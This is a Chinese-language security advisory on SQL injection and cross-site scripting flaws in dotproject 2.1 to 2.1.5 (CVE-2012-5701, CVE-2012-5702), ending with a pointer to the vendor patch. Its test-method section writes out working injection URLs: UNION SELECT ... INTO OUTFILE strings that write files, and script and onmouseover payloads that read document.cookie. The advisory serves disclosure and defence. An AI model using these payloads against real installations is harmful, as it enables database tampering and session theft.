Dotproject多个SQL注入和跨站脚本执行漏洞
发布日期:2012-11-21
更新日期:2012-11-23
受影响系统:
dotproject dotproject 2.1.3
dotproject dotproject 2.1.5
dotproject dotproject 2.1.2
dotproject dotproject 2.1.1
dotproject dotproject 2.1-rc2
dotproject dotproject 2.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56624
CVE ID: CVE-2012-5701,CVE-2012-5702
Dotproject是一个PHP+MySql编写的beta级基于web的项目管理和跟踪工具。
Dotproject 2.1.7之前版本存在多个SQL注入和跨站脚本执行漏洞,利用这些漏洞攻击者可以窃取Cookie身份验证凭证、跨站应用、访问或修改数据、利用下层数据库内的其他漏洞。
<*来源:High-Tech Bridge Security Research Lab
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SQL-injection:
http://www.example.com/index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8, 9,10,11%20INTO%20OUTFILE%20%27file.txt%27%20--%202
http://www.example.com/index.php?m=contacts&where=%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8,9,10,11%2 0INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
http://www.example.com/index.php?m=departments&dept_id=%27%20UNION%20SELECT%20version%28%29%20INTO%20OUTFILE% 20%27/tmp/file.txt%27%20--%202
http://www.example.com/?m=projects&update_project_status=1&project_status=1&project_id[]=%27%20UNION%20SELECT %20version%28%29%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
http://www.example.com/?m=system&a=billingcode&company_id=0%20UNION%20SELECT%201,2,3,4,5,6%20INTO%20OUTFILE%2 0%27/tmp/file.txt%27%20--%202
Cross-site scripting:
http://www.example.com/?m=public&a=color_selector&callback=%3C/script%3E%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E
http://www.example.com/?m=public&a=date_format&field=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
http://www.example.com/index.php?m=contacts&a=addedit&contact_id=0&company_id=1&company_name=%22%20onmouseove r=%22javascript:alert%28document.cookie%29%22
http://www.example.com/index.php?a=day_view&date=%22%20onmouseover=%22javascript:alert%28document.cookie%29%2 2
建议:
--------------------------------------------------------------------------------
厂商补丁:
dotproject
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: